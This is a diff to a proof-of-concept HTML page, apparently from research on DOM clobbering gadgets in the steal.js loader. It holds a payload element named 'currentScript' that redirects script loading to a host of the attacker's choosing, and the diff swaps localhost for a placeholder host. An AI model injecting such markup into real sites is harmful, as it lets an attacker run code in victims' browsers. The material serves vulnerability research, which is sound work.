--- a/domc-gadgets-assets/steal/poc.html
+++ b/domc-gadgets-assets/steal/poc.html
@@ -1,7 +1,7 @@
 <!doctype html>
 <html>
   <body>
-    <image name="currentScript" src="http://localhost:8000/"></image>
+    <!-- <image name="currentScript" src="http://xxx.xxx.xxx:8000/"></image> -->
     <script src="./node_modules/steal/steal.js" main></script>
   </body>
 </html>
